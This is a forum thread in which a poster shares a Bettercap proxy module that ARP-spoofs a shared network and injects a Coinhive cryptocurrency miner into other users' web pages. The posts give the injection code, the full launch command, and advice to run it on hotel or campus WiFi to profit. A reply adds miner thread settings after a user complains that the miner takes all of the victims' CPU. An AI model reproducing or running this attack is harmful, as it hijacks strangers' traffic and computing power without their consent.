Injecting Coinhive JS with Bettercap

ruby
mitm
coinhive
mining

(hihe bark) #1

Hi,
This is my first post, I’m not sure if it allowed here to write about that! but the worst thing that will happen is the removal of this post.
It been a while that i am working with bettercap. “Bettercap it Better(ettercap for making a MiMT attack) version written in ruby by @evilsocket”, with a lot of integrated options and more flexibility. I have read all proxy modules and it been fun, but i didn’t have any idea about to write my own. so this tweet come to me and that’s it i had my idea.
The concept was to inject js coin miner on an http response, with the help of coinhive site i have the js coin miner and my public KEY, And then some simple script in ruby (i am not a wizard in ruby but i get the basic), i need it a the user to pass the key argument --coin-key KEY it was like this:

@@coinkey = nil
def self.on_options(opts)
    opts.on( '--coin-key KEY', 'Your site key on coinhive.' ) do |v|
      @@coinkey = v
    end
  end

and if --coin-key is not set raise an error. So now we have the key we need to integrated in the js:

@loadcoinhive = "<script src='https://coinhive.com/lib/coinhive.min.js'></script> //coinhive js library "
@jscontent = "<script> var miner = new CoinHive.Anonymous('#{@@coinkey}'); miner.start(); </script>"
@jsfile = "#{@loadcoinhive}#{@jscontent}"

All we got’a to do is on every request of the type html we inject that jsfile that we created --^, Now we need to inject it were it will be executed! and yes after </title> so it will be like this:

response.body.sub!( '</title>', "</title>#{@jsfile}" )

And that’s it now you can connect to you’re free WIFI (hotel, campus, …) and run out this command in your terminal: ~># bettercap -X -S ARP --proxy --proxy-module Scripts/makemoney.rb --coin-key "YOUR_KEY_HERE" my module is under my Scripts folder so change it with yours.
Hope you like the post and don’t forget to install HTTPS Everywhere on you’r browser when you’re using public WIFI. Peace

you can clone the script here >> makemoney.rb


(oaktree) #2

Hi there @hihebark,

Would you please explain what exactly you did and how it works?


(hihe bark) #3

hello @oaktree
If you’re talking about the code the code is simple, i tried to make it as easy as possible.
Bettercap will search for a response with html type and then replace the </title> with </title><script src='https://coinhive.com/lib/coinhive.min.js'></script><script> var miner = new CoinHive.Anonymous('KEY'); miner.start(); </script> the KEY is passed after --coin-key KEY.
Now for the js is provided by coinhive.com, for the documentation.
Then you can connect to you’r campus WiFi or hotel and run the command above # bettercap -X -S ARP --proxy --proxy-module Scripts/makemoney.rb --coin-key "YOUR_KEY_HERE" and profit.
I hope that i provided a full explanation. Sorry for my english.


(oaktree) #4

What I meant was, you should post a complete tutorial on your tool. It’d be cool if you explained the concepts and so on. The Code of Conduct prohibits simple link dropping without explanation…


(hihe bark) #5

Ok Mr @oaktree now i get you, i will re-edit my post.


#6

Great work man !. Is there any possibilities to control usage of cpu for injected machine ?. Now it takes all cpu which it just gets.


(hihe bark) #7

you are welcome : ) @Ph4ant0m
Yes sure you can in the Js you can put the number of thread that will be in use like this:

<script>
var miner = new CoinHive.Anonymous(
    '#{@@coinkey}',
    threads: 4,
    autoThreads: false
); 
miner.start(); 
</script>

or just by setting them before miner.start(); like this miner..setNumThreads(2); miner.setAutoThreadsEnabled(false); and you’r done.

for more option go to >> coinhive documentation


#8

thanks again…rtfm :smile: and there it was :).


(system) #9

This topic was automatically closed after 30 days. New replies are no longer allowed.